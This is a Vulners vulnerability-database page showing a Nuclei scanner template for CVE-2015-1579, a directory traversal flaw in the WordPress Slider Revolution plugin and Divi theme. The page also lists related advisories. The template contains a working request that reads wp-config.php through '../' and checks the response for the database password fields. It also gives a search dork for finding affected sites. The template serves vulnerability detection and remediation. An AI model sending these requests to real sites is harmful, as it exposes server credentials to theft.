Vulners
Lucene search
WordPress Slider Revolution - Local File Disclosure
| Reporter | Title | Published | Views | Family All 19 |
|---|---|---|---|---|
 | Exploit for Path Traversal in Elegantthemes Divi | 3 Feb 201712:00 | – | githubexploit |
| Exploit for Path Traversal in Elegantthemes Divi | 3 Feb 201621:44 | – | githubexploit |
 | CVE-2015-1579 | 1 Sep 201400:00 | – | circl |
 | WordPress Elegant Themes Divi Theme Directory Traversal Vulnerability | 21 Feb 201500:00 | – | cnvd |
 | WordPress Slider Revolution Plugin Local File Inclusion (CVE-2014-9734; CVE-2015-1579) | 17 Dec 201400:00 | – | checkpoint_advisories |
 | CVE-2015-1579 | 11 Feb 201519:00 | – | cve |
 | CVE-2015-1579 | 11 Feb 201519:00 | – | cvelist |
 | WordPress Slider Revolution Responsive File Disclosure | 12 Jan 201500:00 | – | dsquare |
 | KLA10491 Multiple vulnerabilities in WordPress plugins | 17 Mar 201500:00 | – | kaspersky |
 | CVE-2015-1579 | 11 Feb 201519:59 | – | nvd |
10
id: CVE-2015-1579
info:
name: WordPress Slider Revolution - Local File Disclosure
author: pussycat0x
severity: medium
description: |
Directory traversal vulnerability in the Elegant Themes Divi theme for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the img parameter in a revslider_show_image action to wp-admin/admin-ajax.php. NOTE: this vulnerability may be a duplicate of CVE-2014-9734.
impact: |
An attacker can read arbitrary files on the server, potentially exposing sensitive information.
remediation: |
Update the WordPress Slider Revolution plugin to the latest version to fix the vulnerability.
reference:
- https://blog.sucuri.net/2014/09/slider-revolution-plugin-critical-vulnerability-being-exploited.html
- https://cxsecurity.com/issue/WLB-2021090129
- https://wpscan.com/vulnerability/4b077805-5dc0-4172-970e-cc3d67964f80
- https://nvd.nist.gov/vuln/detail/CVE-2015-1579
- https://wpvulndb.com/vulnerabilities/7540
classification:
cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N
cvss-score: 5
cve-id: CVE-2015-1579
cwe-id: CWE-22
epss-score: 0.22055
epss-percentile: 0.97355
cpe: cpe:2.3:a:elegant_themes:divi:-:*:*:*:*:wordpress:*:*
metadata:
max-request: 2
vendor: elegant_themes
product: divi
framework: wordpress
google-query: inurl:/wp-content/plugins/revslider
tags: cve2015,cve,wordpress,wp-plugin,lfi,revslider,wp,wpscan,elegant_themes,vkev,vuln
http:
- method: GET
path:
- '{{BaseURL}}/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php'
- '{{BaseURL}}/blog/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php'
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- "'DB_NAME'"
- "'DB_PASSWORD'"
- "'DB_USER'"
condition: and
- type: status
status:
- 200
# digest: 4a0a00473045022078f83a479afdfaa53ee3955198c130129f15b2e1749ed6d7a108d83d5e457269022100d504754c1dd25b5dcc1ec4459e6584be5fbf8dd851e49ca73cae0c73e6b5bb52:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
04 Feb 2026 07:00Current
8.5High risk
Vulners AI Score8.5
CVSS 25
EPSS0.22055